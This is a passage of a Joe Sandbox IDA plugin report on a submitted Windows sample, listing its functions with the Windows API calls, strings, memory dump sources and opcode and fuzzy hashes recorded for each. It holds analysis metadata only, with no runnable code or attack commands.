%s %s, xrefs: 00B8BB29, 00B8BC4E
REPLACEFILEDLG, xrefs: 00B8B907
%s %s %s, xrefs: 00B8BAB2, 00B8BBE7

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: af8f105fa1d355a72a7841752def7b340456d2c4bbc98746f8e3435de904e3f0
Instruction ID: 9b8be35665a3d7562ecbe57b7f79ecf3614e1ee1ea92ae4c730a3ba235b09182
Opcode Fuzzy Hash: af8f105fa1d355a72a7841752def7b340456d2c4bbc98746f8e3435de904e3f0
Instruction Fuzzy Hash: 0C916272148348BBD621ABB0DD49FEBB7ECEB4A700F044859F749D20A1DB759605CB62

Function 00B7718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B77191
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00B772F1
CloseHandle.KERNEL32(00000000), ref: 00B77301

Part of subcall function 00B77BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B77C04
Part of subcall function 00B77BF5: GetLastError.KERNEL32 ref: 00B77C4A
Part of subcall function 00B77BF5: CloseHandle.KERNEL32(?), ref: 00B77C59

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00B7730C
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00B7741A
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00B77446
CloseHandle.KERNEL32(?), ref: 00B77457
GetLastError.KERNEL32 ref: 00B77467
RemoveDirectoryW.KERNEL32(?), ref: 00B774B3
DeleteFileW.KERNEL32(?), ref: 00B774DB

Strings

SeRestorePrivilege, xrefs: 00B771B2
UNC\, xrefs: 00B7723C
\??\, xrefs: 00B77217
SeCreateSymbolicLinkPrivilege, xrefs: 00B771BC

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: 4fd4b36a702dbfbc7daa6b26b435c7787c3d4b42922d84673b1adaebf649c0a9
Instruction ID: c4b912a9f8bec33f6b413e973a8496b1b07e07c531b9769df4ea5bdaf0e8721c
Opcode Fuzzy Hash: 4fd4b36a702dbfbc7daa6b26b435c7787c3d4b42922d84673b1adaebf649c0a9
Instruction Fuzzy Hash: 64B10271904215ABDF21DBA4CC81BEEB7F8EF05700F0084E9F959E7252DB34AA49CB61

Function 00B73281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B7328A
_memcmp.LIBVCRUNTIME ref: 00B73377

Strings

h%u, xrefs: 00B7362D
CMT, xrefs: 00B73990
hc%u, xrefs: 00B7367B

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: e1f8f40d8a58fbaa333f656a5317adc593d1505f3292ab3f0b6d15e95519d0ec
Instruction ID: 744371042fb223b257e1950fa414f0118029c50742205efda6314beaae017b17
Opcode Fuzzy Hash: e1f8f40d8a58fbaa333f656a5317adc593d1505f3292ab3f0b6d15e95519d0ec
Instruction Fuzzy Hash: 5832B4715142849FDF15DF24C896AEA3BE5EF14700F0484BDFDAE8B282DB709A44DB60

Function 00B9D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00B9D154

Strings

1#QNAN, xrefs: 00B9E35A
1#SNAN, xrefs: 00B9E353
1#INF, xrefs: 00B9E361
1#IND, xrefs: 00B9E34C

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 55667999a6ebda406934624d328ca8791e5765895ef0396def8444082f033d44
Instruction ID: f1dde5cd75ecb8a1be82e29c227d01be1b1bf4b9fd37876a7071e5875274b482
Opcode Fuzzy Hash: 55667999a6ebda406934624d328ca8791e5765895ef0396def8444082f033d44
Instruction Fuzzy Hash: ABC22772E086288BDF25CE29DD417EAB7F5EB84305F1541EAD81DE7241E774AE818F40

Function 00B727E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B727F1
_strlen.LIBCMT ref: 00B72D7F

Part of subcall function 00B8137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00B7B652,00000000,?,?,?,0001040E), ref: 00B81396

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B72EE0

Strings

CMT, xrefs: 00B72F13

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: 88bc26d8e115a462ff2fe58d7811aa77ca990563447cb73a155cef7bf7c5398b
Instruction ID: e20107ff4319633155d2ba9d29352245b810ab29cc8de1e081537f4f59c0cde4
Opcode Fuzzy Hash: 88bc26d8e115a462ff2fe58d7811aa77ca990563447cb73a155cef7bf7c5398b
Instruction Fuzzy Hash: EB62D5715042448FDF19DF38C8966EA3BE1EF64300F0985BDEDAE9B282D771A945CB50

Function 00B9866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B98767
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B98771
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00B9877E

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1e2bb0035d99a0768bfc3985e7c2ae99d81d2540adbd9ea17a1279f72c8ce461
Instruction ID: 5d4e1e70f9854b417eb8989cfcaf5ba3e4124396563835b82157fed3c4dc0ee3
Opcode Fuzzy Hash: 1e2bb0035d99a0768bfc3985e7c2ae99d81d2540adbd9ea17a1279f72c8ce461
Instruction Fuzzy Hash: BB31B5759012299BCB21DF64D889B9CB7F4EF09710F5041EAF81CA7261EB349F858F45

Function 00B9CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction ID: 9b52f8607176f87624aab4d945b1ac37dd8f489e9fa578a7f3e38d316e490e15
Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction Fuzzy Hash: 8C021C71E002199BDF14CFA9C8806ADBBF1EF88314F2581BAE919E7385D731AD45CB94

Function 00B8A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00B8A662
GetNumberFormatW.KERNEL32(00000400,00000000,?,00BAE600,?,?), ref: 00B8A6B1

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 7998075fd475eff60fc87b55ae1380e0527c88da65ac54b07ee384c36af8eadf
Instruction ID: 2a167f3cc2c45191fba4afa834f7a7fd98b4c089c1e0b4bcf4443a5c8285f661
Opcode Fuzzy Hash: 7998075fd475eff60fc87b55ae1380e0527c88da65ac54b07ee384c36af8eadf
Instruction Fuzzy Hash: 67017136240208BFD7109F64DC46FAB77FCEF19710F004862FA14A7160D7709A15CBA5

Function 00B76EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00B8117C,?,00000200), ref: 00B76EC9
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00B76EEA

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 6c0ca367e1087b3887d3ff993c290d13498a75e5922e23f973eb636584afd866
Instruction ID: fa29ebe87d033bf1aef43f4fe69a80dbd72b11c6e30c1e182b747aeb881adf3e
Opcode Fuzzy Hash: 6c0ca367e1087b3887d3ff993c290d13498a75e5922e23f973eb636584afd866
Instruction Fuzzy Hash: A4D0C9353C8302BFEA610A74CC06F6B7BE4A757F82F20D554B36BEA4E0CA7090149629

Function 00BA1194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BA118F,?,?,00000008,?,?,00BA0E2F,00000000), ref: 00BA13C1

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 5401ac0da8f87e3879aec15e57cc7bc4b0991c3e75c474561c410c36884c0ef5
Instruction ID: 36a179c2211b121f4d9299d832b2d4beee92d59b4a36980fc0ac4630ac45e2e9
Opcode Fuzzy Hash: 5401ac0da8f87e3879aec15e57cc7bc4b0991c3e75c474561c410c36884c0ef5
Instruction Fuzzy Hash: F1B16B716146089FDB55CF2CC48AB657BE0FF0A364F258A98E899CF2A1C735E981CB44

Function 00B7407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

gj, xrefs: 00B740C1

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 069c2429d4c7e5ad3928131ce2fdfe659d46e0b470877822f85bacabc5f7e030
Instruction ID: dd0a7349c4654ffc9816e28f965158a8e96771f3a37a4d54f75be16c894e1312
Opcode Fuzzy Hash: 069c2429d4c7e5ad3928131ce2fdfe659d46e0b470877822f85bacabc5f7e030
Instruction Fuzzy Hash: CBF1C3B1A083418FC748CF29D880A1AFBE1BFCC608F19896EF598D7711E734E9558B56

Function 00B7ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00B7AD1A

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 19807903efc999a32db84bd2dd6382de193fd1d4723fcc267d17985bd87f5a5e
Instruction ID: 5dd79a14205083738a18d1ea4aea64d54dc5461d376e6b57fe61b70002a80d55
Opcode Fuzzy Hash: 19807903efc999a32db84bd2dd6382de193fd1d4723fcc267d17985bd87f5a5e
Instruction Fuzzy Hash: C9F0F9B0A002088BC738DF18EC826FA73A5F799711F2042A5DA2943754DBB0E940CE61

Function 00B8F063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,00B8EAC5), ref: 00B8F068

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8e1524a803029aaf1ac8b034adfbeef457e49dbe443325b41f15ece8903597a8
Instruction ID: 07248b01ecaa412545c23cfe091023ef1c111626188614ca45bd88af324605a2
Opcode Fuzzy Hash: 8e1524a803029aaf1ac8b034adfbeef457e49dbe443325b41f15ece8903597a8
Instruction Fuzzy Hash:

Function 00B9B710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00B9B710

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 3d6a515725a4e8bbf839fb7e397b57bb887d8f695464ea5e488a12b7701adaa6
Instruction ID: 87c7f5a64ab0b8bf9b404c5eb222ca601696c3b8031bb21fea7b91e32138172e
Opcode Fuzzy Hash: 3d6a515725a4e8bbf839fb7e397b57bb887d8f695464ea5e488a12b7701adaa6
Instruction Fuzzy Hash: 28A001B46022019B9740CFBAAA2A30DBAE9AA46A91709C66AA509D7160EE2485609F01

Function 00B85C77 Relevance: .8, Instructions: 800COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
Instruction ID: 05cd7b9a891bbf17a981c37a172de822022a188250951735a67bb3963f14afbd
Opcode Fuzzy Hash: 8a6e4fef8a49dcc930715721b7d4fffbd12b6467634e9eef11ded152ea66fbae
Instruction Fuzzy Hash: 1A620871604B859FCB25EF38C9906F9BBE1EF55304F0885ADD8AB8B356D630E945CB10

Function 00B870BF Relevance: .8, Instructions: 773COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
Instruction ID: 5f5f2d39425e2cda40c580b59808e6efb82a4b578aec5ddf71b1ddc9a21d4c07
Opcode Fuzzy Hash: 575a8806441ce9a72c04ae9113137d22797e0c306676329538b0a0bf3ae15e30
Instruction Fuzzy Hash: 0A6248706487469FC719EF28C8805B9FBE1FF55308F2486ADD8AA87752DB30E955CB80

Function 00B7ED14 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
Instruction ID: 660fc96cbbd13387e4514ff9c9e83ca5d6153b61a6bf9167dec8837ba96f448e
Opcode Fuzzy Hash: d5448180e84c52624f7729a892eb382d9b2428a7fa06f80140d36ae3f2e7eaf5
Instruction Fuzzy Hash: 3E523AB26087018FC718CF19C891A6AF7E1FFCC304F498A2DE99597255D734EA19CB86

Function 00B86A7B Relevance: .5, Instructions: 509COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de48d3e4216346382547d154f22dc35636a39dcb985a9a9b5c508ea154b6320a
Instruction ID: b90995436618313ed99605d188c71a9cc2fdc6df02420914326da2dfa783f16e
